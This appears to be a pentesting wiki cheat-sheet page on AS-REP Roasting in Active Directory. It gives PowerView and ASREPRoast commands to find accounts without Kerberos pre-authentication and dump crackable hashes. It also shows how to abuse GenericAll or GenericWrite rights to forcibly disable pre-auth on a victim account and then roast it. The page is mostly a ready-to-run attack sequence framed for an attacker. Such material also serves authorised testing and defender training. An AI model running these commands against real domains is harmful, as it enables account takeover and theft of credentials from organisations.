AS-REP ROASTING

Users with Kerberos Pre-Authentication disabled are more likely to be vulnerable to AS-REP Roasting

KERBEROS PRE-AUTH DISABLED

Enumerate domain users without Kerberos Pre-Authentication

PowerView
Get-DomainUser -PreauthNotRequired

AS-REP Roasting for the specific user to get the crackable hash

ASREPRoast
Get-ASREPHash -UserName <USERNAME>

KERBEROS PRE-AUTH NOT DISABLED

Kerberos Pre Authentication is enabled by default

To perform AS-REP Roasting, Kerberos Pre-Auth should be disabled for a specific user

We need "GenericAll" or "GenericWrite" permission on ACL to modify the Kerberos Pre-Auth

Attacker should be a part of any AD object same as Victim

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}

Forcefully disabling the Kerberos Pre-Auth

Set-DomainObject -Identity <USERNAME> -XOR @{useraccountcontrol=4194304}

Verifying the Kerberos Pre-Auth Property for the user

Get-DomainUser -PreauthNotRequired -Identity <USERNAME> 

Get-DomainUser -PreauthNotRequired -Identity <USERNAME> | Select -ExpandProperty useraccountcontrol

AS-REP Roasting for the specific user to get the crackable hash

ASREPRoast
Get-ASREPHash -UserName <USERNAME>

CRACK

PreviousKERBEROASTINGNextTARGETED AS-REP ROASTING

Last updated